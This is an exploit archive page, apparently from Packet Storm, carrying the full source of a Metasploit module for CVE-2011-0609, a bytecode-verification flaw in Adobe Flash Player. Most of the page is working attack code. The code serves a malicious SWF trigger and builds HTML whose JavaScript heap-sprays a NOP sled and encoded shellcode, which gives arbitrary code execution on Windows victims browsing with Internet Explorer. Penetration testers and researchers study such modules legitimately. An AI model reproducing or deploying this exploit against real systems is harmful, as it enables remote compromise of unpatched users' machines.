what you don't know can hurt you

Adobe Flash Player AVM Bytecode Verification

Adobe Flash Player AVM Bytecode Verification
Posted Mar 23, 2011
Authored by bannedit | Site metasploit.com

This Metasploit module exploits a vulnerability in AVM2 action script virtual machine used in Adobe Flash Player versions 9.0 through 10. The AVM fails to properly verify bytecode streams prior to executing it. This can cause uninitialized memory to be executed. Utilizing heap spraying techniques to control the uninitialized memory region it is possible to execute arbitrary code. Typically Flash Player is not used as a standalone application. Often, SWF files are embedded in other file formats or specifically loaded via a web browser. Malcode was discovered in the wild which embedded a malformed SWF file within an Excel spreadsheet. This exploit is based off the byte stream found within that malcode sample.

tags | exploit, web, arbitrary
advisories | CVE-2011-0609
MD5 | ebac5f8deeda180b8034790847e030d2

Adobe Flash Player AVM Bytecode Verification

Change Mirror Download
##
# $Id: adobe_flashplayer_avm.rb 12091 2011-03-23 04:41:48Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Flash Player AVM Bytecode Verification',
'Description' => %q{
This module exploits a vulnerability in AVM2 action script virtual machine used
in Adobe Flash Player versions 9.0 through 10. The AVM fails to properly verify
bytecode streams prior to executing it. This can cause uninitialized memory to be
executed.

Utilizing heap spraying techniques to control the uninitialized memory region it is
possible to execute arbitrary code. Typically Flash Player is not used as a
standalone application. Often, SWF files are embeded in other file formats or
specifically loaded via a web browser. Malcode was discovered in the wild which
embeded a malformed SWF file within an Excel spreadsheet. This exploit is based
off the byte stream found within that malcode sample.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bannedit' # Metasploit version
],
'Version' => '$Revision: 12091 $',
'References' =>
[
['CVE', '2011-0609'],
['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
['URL', 'http://www.adobe.com/devnet/swf.html'],
['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Ret' => 0x04040404 }],
],
'DisclosureDate' => 'Mar 15 2011',
'DefaultTarget' => 0))
end

def load_swfs
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0609.swf" )
fd = File.open( path, "rb" )
trigger = fd.read(fd.stat.size)
fd.close
return trigger
end

def on_request_uri(cli, request)
trigger = load_swfs
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"

if request.uri.match(/\.swf/i)
print_status("Sending Trigger SWF")
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
return
end

shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
nops = [target.ret].pack('V')
nop_sled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))

var_blocks = rand_text_alpha(rand(6)+3)
var_shellcode = rand_text_alpha(rand(6)+3)
var_index = rand_text_alpha(rand(6)+3)
var_nopsled = rand_text_alpha(rand(6)+3)
spray_func = rand_text_alpha(rand(6)+3)
obj_id = rand_text_alpha(rand(6)+3)

# The methods used in this exploit currently could be improved. Heap spraying can likely
# be done using ActionScript. I am still investigating this possibility. Additionally,
# Hafei Li has been conducting some interesting research in the area of ActionScript
# related vulnerabilities which could be leveraged for this exploit.
#
# Currently this method only works with IE as Firefox runs Flash in a container process
# which is uneffected by JS heap spraying.
html = <<-EOS
<html>
<head>
</head>
<body>
<script>
function #{spray_func}() {
#{var_blocks} = new Array();
var #{var_shellcode} = unescape("#{shellcode}");
var #{var_nopsled} = unescape("#{nop_sled}");
do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
for (#{var_index}=0; #{var_index} < 25000; #{var_index}++)
#{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
}
#{spray_func}();
</script>
<center>

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
id="#{obj_id}" width="0" height="0"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="#{trigger_file}" />
</object>
</center>

</body>
</html>
EOS

print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    15 Files
  • 4
    Apr 4th
    5 Files
  • 5
    Apr 5th
    5 Files
  • 6
    Apr 6th
    27 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close